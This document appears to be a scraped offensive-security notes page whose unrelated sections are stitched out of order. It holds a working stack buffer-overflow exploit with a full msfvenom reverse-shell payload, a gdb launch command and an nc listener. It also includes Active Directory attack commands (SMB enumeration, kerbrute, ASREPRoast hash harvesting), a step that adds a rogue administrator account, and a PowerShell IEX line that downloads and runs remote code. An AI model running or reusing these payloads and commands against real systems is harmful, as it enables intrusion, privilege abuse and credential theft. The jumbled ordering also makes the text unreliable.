CHARS="\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

# string length
echo $CHARS | sed 's/\\x/ /g' | wc -w
256

We need to calculate our buffer again.

Buffer = "\x55" * (1040 - 256 - 4) = 780
CHARS = "\x00\x01\x02\x03\x04\x05...<SNIP>...\xfd\xfe\xff"
EIP = "\x66" * 4

Look at the whole main function to set a breakpoint at the corresponding function so that the execution stops at this point and we can analyze the memory's content :

(gdb) disas main

# setting the breakpoint at the function
(gdb) break bowfunc

# send chars
(gdb) run $(python -c 'print "\x55" * (1040 - 256 - 4) + "\x00\x01\x02\x03\x04\x05...<SNIP>...\xfc\xfd\xfe\xff" + "\x66" * 4')

# look at the stack
(gdb) x/2000xb $esp+500

# identify all bad characters - look where the chars start
# adjust the number of chars from the one who are bad
# Substract the number of removed characters

# Buffer = "\x55" * (1040 - 255 - 4) = 781
# "\x00" removed: 256 - 1 = 255 bytes
# CHARS = "\x01\x02\x03...<SNIP>...\xfd\xfe\xff"
# EIP = "\x66" * 4

# send without the null byte
(gdb) run $(python -c 'print "\x55" * (1040 - 255 - 4) + "\x01\x02\x03\x04\x05...<SNIP>...\xfc\xfd\xfe\xff" + "\x66" * 4')

# the stack
x/2000xb $esp+550

# check for other bad chars ... etc

Generate shellcode

msfvenom

# syntahx
msfvenom -p linux/x86/shell_reverse_tcp lhost=<LHOST> lport=<LPORT> --format c --arch x86 --platform linux --bad-chars "<chars>" --out <filename>

# real command
msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode

# content of shellcode
❯ cat shellcode
unsigned char buf[] = 
"\xbe\x6e\x05\xb5\x18\xdd\xc1\xd9\x74\x24\xf4\x5a\x31\xc9"
"\xb1\x12\x31\x72\x12\x03\x72\x12\x83\x84\xf9\x57\xed\x69"
"\xd9\x6f\xed\xda\x9e\xdc\x98\xde\xa9\x02\xec\xb8\x64\x44"
"\x9e\x1d\xc7\x7a\x6c\x1d\x6e\xfc\x97\x75\x0e\xfe\x67\x84"
"\x98\xfc\x67\xfc\x31\x88\x89\xb0\xa4\xda\x18\xe3\x9b\xd8"
"\x13\xe2\x11\x5e\x71\x8c\xc7\x70\x05\x24\x70\xa0\xc6\xd6"
"\xe9\x37\xfb\x44\xb9\xce\x1d\xd8\x36\x1c\x5d";

# Now that we have our shellcode, we adjust it to have only one string, and then we can adapt and submit our simple exploit again.

# Buffer = "\x55" * (1040 - 124 - 95 - 4) = 817
# NOPs = "\x90" * 124
# Shellcode = "\xda\xca\xba\xe4\x11...<SNIP>...\x5a\x22\xa2"
# EIP = "\x66" * 4'

# EXPLOIT
(gdb) run $(python -c 'print "\x55" * (1040 - 124 - 95 - 4) + "\x90" * 124 + ""\xbe\x6e\x05\xb5\x18\xdd\xc1\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x12\x31\x72\x12\x03\x72\x12\x83\x84\xf9\x57\xed\x69\xd9\x6f\xed\xda\x9e\xdc\x98\xde\xa9\x02\xec\xb8\x64\x44\x9e\x1d\xc7\x7a\x6c\x1d\x6e\xfc\x97\x75\x0e\xfe\x67\x84\x98\xfc\x67\xfc\x31\x88\x89\xb0\xa4\xda\x18\xe3\x9b\xd8\x13\xe2\x11\x5e\x71\x8c\xc7\x70\x05\x24\x70\xa0\xc6\xd6\xe9\x37\xfb\x44\xb9\xce\x1d\xd8\x36\x1c\x5d"" + "\x66" * 4')

# reverse shell 
nc -lvnp 31337

Introduction

Brief

What is a Buffer Overflow ?

In short, buffer overflows are caused by incorrect program code, which cannot process too large amounts of data correctly by the CPU and can, therefore, manipulate the CPU's processing. Suppose too much data is written to a reserved memory buffer or stack that is not limited, for example. In that case, specific registers will be overwritten, which may allow code to be executed.

A buffer overflow can cause the program to crash, corrupt data, or harm data structures in the program's runtime. The last of these can overwrite the specific program's return address with arbitrary data, allowing an attacker to execute commands with the privileges of the process vulnerable to the buffer overflow by passing arbitrary machine code. This code is usually intended to give us more convenient access to the system to use it for our own purposes. Such buffer overflows in common servers, and Internet worms also exploit client software.

The most significant cause of buffer overflows is the use of programming languages that do not automatically monitor limits of memory buffer or stack to prevent (stack-based) buffer overflow. These include the C and C++ languages, which emphasize performance and do not require monitoring.

Central Processing Unit (CPU)

CPU Architecture

The Central Processing Unit (CPU) is the functional unit in a computer that provides the actual processing power. It is responsible for processing information and controlling the processing operations. To do this, the CPU fetches commands from memory one after the other and initiates data processing. Each CPU has an architecture on which it was built. The best-known CPU architectures are:

x86/i386 - (AMD & Intel)
x86-64/amd64 - (Microsoft & Sun)
ARM - (Acorn) Each of these CPU architectures is built in a specific way, called Instruction Set Architecture (ISA), which the CPU uses to execute its processes. ISA, therefore, describes the behavior of a CPU concerning the instruction set used. The instruction sets are defined so that they are independent of a specific implementation. Above all, ISA gives us the possibility to understand the unified behavior of machine code in assembly language concerning registers, data types, etc.

There are four different types of ISA:

CISC - Complex Instruction Set Computing
RISC - Reduced Instruction Set Computing
VLIW - Very Long Instruction Word
EPIC - Explicitly Parallel Instruction Computing

In the Von-Neumann architecture, the most important units, the Arithmetical Logical Unit (ALU) and Control Unit (CU), are combined in the actual Central Processing Unit (CPU).

The CPU is responsible for executing the instructions and for flow control.

The instructions are executed one after the other, step by step.

The commands and data are fetched from memory by the CU.

The connection between processor, memory, and input/output unit is called a bus system, which is not mentioned in the original Von-Neumann architecture but plays an essential role in practice.

In the Von-Neumann architecture, all instructions and data are transferred via the bus system.

Memory

It can be divided into 2 categories :

Primary memory
- The Cache and Random Access Memory (RAM).
- We can think of it as leaving something at one of our friends to pick it up again later. But for this, it is necessary to know the friend's address to pick up what we have left behind. It is the same as RAM. RAM describes a memory type whose memory allocations can be accessed directly and randomly by their memory addresses. The cache is integrated into the processor and serves as a buffer, which in the best case, ensures that the processor is always fed with data and program code. Before the program code and data enter the processor for processing, the RAM serves as data storage. The size of the RAM determines the amount of data that can be stored for the processor. However, when the primary memory loses power, all stored contents are lost.
Secondary memory
- The external data storage, such as HDD/SSD, Flash Drives and CD/DVD-ROMs of a computer, which is not directly accessed by the CPU, but via the I/O interfaces. In other words, it is a mass storage device. It is used to permanently store data that does not need to be processed at the moment. Compared to primary memory, it has a higher storage capacity, can store data permanently even without a power supply, and works much slower.

Control Unit

Control Unit (CU)

The Control Unit (CU) is responsible for the correct interworking of the processor's individual parts. An internal bus connection is used for the tasks of the CU.

The tasks of the CU can be summarised as follows:

Reading data from the RAM
Saving data in RAM
Provide, decode and execute an instruction
Processing the inputs from peripheral devices
Processing of outputs to peripheral devices
Interrupt control
Monitoring of the entire system

Instruction Cycle

# INSTALL
git clone https://github.com/lefayjey/linWinPwn
cd linWinPwn; chmod +x linWinPwn.sh
chmod +x install.sh
./install.sh
./linWinPwn.sh -h

# USAGE
# on the Windows host, run using PowerShell:
ssh kali@$ip_attacker -R 1080 -NCqf

# On the Linux machine, first update /etc/proxychains4.conf to include socks5 127.0.0.1 1080, then run:
proxychains ./linWinPwn.sh -t $DC_IP

# enum4linux
# default
enum4linux $ip
# runs all options
enum4linux -a $ip
# If you've obtained credentials => pull a full list of users regardless of the RestrictAnonymous option
enum4linux -u '$user' -p '$pass' -a $ip


# nmap
# enumerate smb shares, brute, get infos
nmap --script 'smb-enum-shares,smb-os-discovery,smb-brute,smb-system-info,smb-vuln*' -p 139,445 $ip


# netexec
# only in upgraded Windows servers from 2003 - No auth attempt
# Enumerate user shares anonymously
nxc smb $domainOrIP -u '' -p '' --shares
# to get password policy, minimum length, account lockout threshold
nxc smb $domainOrIP --pass-pol -u '' -p ''	
# The usernames with RID greater than 1000 into a username file
nxc smb $domainOrIP -u robot -p '' --rid-brute | grep SidTypeUser	


# smbmap
python3 smbmap.py --host-file smb-hosts.txt -d $domain -L

# Default Output
smbmap.py -H 0.0.0.0 -u administrator -p asdf1234

# Default Output, with NTML hash
smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 0.0.0.0

# Command execution
smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group "Domain Admins" /domain' -H 0.0.0.0

# with zmap
sudo zmap -i $iface -P 2 --probe-module=icmp_echoscan -B 1M --max-targets=10000000 -o targets_rfc1918.txt $network_ips

# with arp-scan
arp-scan -d $networkrange

# with nxc - smb, ssh, rdp
nxc smb $networkrange

# test for dns attacks
dnsenum $domain -f /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt --dnsserver $dns_server_ip > dnsenum.txt

# discover printers, web, shares, vpn, media
gobuster dns -d $domain -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt

# LINUX HOST
# no auth
# netexec
nxc smb $ip -u anonymous -p "" --rid-brute 10000

# kerbrute
kerbrute -domain $domain -dc-ip $ip -users /tools/payloads/SecLists/Usernames/xato-net-10-million-usernames.txt

# WINDOWS HOST
GetADUsers.py $domain/ -dc-ip $ip

# Get all of the OUs in a domain
Get-ADOrganizationalUnit -Filter 'Name -like "*"' | Format-Table Name, DistinguishedName -A

### Create a new user in admin groupe 

# username:password = anon:p3nT3st!
net user anon p3nT3st! /add
net localgroup administrators anon /add

net user anon p3nT3st! /add;net localgroup administrators anon /add

If you cannot import module start a webserver and
IEX(New-Object Net.Webclient).downloadstring('http://<IP>/Powershell.ps1')

ASREPRoast

In case of last resort.

PS: This attack could be used in a post-compromise scenario but also in the initial attack vectors ;)

Brief

ASREPRoast is about retrieving crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled.
This isn’t as useful as Kerberoasting, as accounts have to have DONT_REQ_PREAUTH() explicitly set for them to be vulnerable and you’re still reliant upon weak password complexity for the attack to work. But who knows, might be the only weak point you need.
Now, if you can enumerate accounts in a Windows domain that don’t require Kerberos preauthentication, you can easily request a piece of encrypted information for said accounts and efficiently crack the material offline, revealing the user’s password.
To do that you need to :

Send the KRB_AS_REQ to get the KRB_AS_REP with the encrypted information, to do so :
1. If you have username :
  1. GetNPUser.py $domain/$username -no-pass -dc-ip $ip -request
2. If you have no username :
  1. GetNPUser.py $domain/ -no-pass -dc-ip $ip -request
Crack hashes :
1. hashcat -m 18200 ticket wordlist

# MISC of commands
# list of users in users file
for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip $ip $domain/${user} | grep -v Impacket; done

GetNPUsers.py -dc-ip $ip -request $domain/

GetNPUsers.py -dc-ip $ip -request $domain/ -format hashcat/john

GetNPUsers.py -dc-ip $ip -usersfile users.txt $domain/

GetNPUsers.py $domain/backup -no-pass

GetNPUsers.py -no-pass $domain/ -usersfile users.txt -format hashcat -outputfile hashes.txt

findDelegation

`Impacket-findDelegation`

Simple script to quickly list all delegation relationships (unconstrained, constrained, resource-based constrained) in an AD environment.

findDelegation.py "DOMAIN"/"USER":"PASSWORD"

# --user feature in 2021
findDelegation.py -user "account" "DOMAIN"/"USER":"PASSWORD"

RED Squad [en]

/home/red-squad

whoami

Recently Added

July 2024

Support our projects

Is There Life After Death ?

After compromising an infrastructure, web app, what is next ?

Web Hacking

CTFs shortcuts

Find flag

Web Dev

Mozilla Firefox

HTTP Headers Response

Stabilize Reverse shell

use CTRL + C

Audits plan

Exposition Audit - Plan

Reconnaissance

Subdomains find

Google Dorks

Tools

Scans

IP2FQDN

nmap

Visualize hosts

gowitness

External Audit - Plan

External Audit - Plan

OSINT

🕵️ OSINT

Ressources

Search Engines

Metasearch Engines and Search Engines:

Online Services

Utilities

User OSINT

Everything

Usernames

Services:

Social Medias

Utils

Passwords

HIBP API keys

Get emails of company with LinkedIn

Search by Phone number

Utils:

Domains, IP, IOT

Search by Internet of Things, IP, Domains, and Subdomains

Services:

Utils

Business OSINT

Methodology

IP addresses

Physical

People

Leaks / DNS

TOR network

Search in the TOR Network

Services

Utilities

Enumeration

HTTP Stuff

Sessions / Tokens

Web Vulnerabilities

Files / Upload

Server-Side Vulnerabilities

Linux Hacking

Windows Hacking

Kerberos

/home/red-squad

whoami

CTFs shortcuts

Find flag

Web Dev

Mozilla Firefox

HTTP Headers Response

Stabilize Reverse shell

use CTRL + C

Exposition Audit - Plan

`whoami`

`whoami`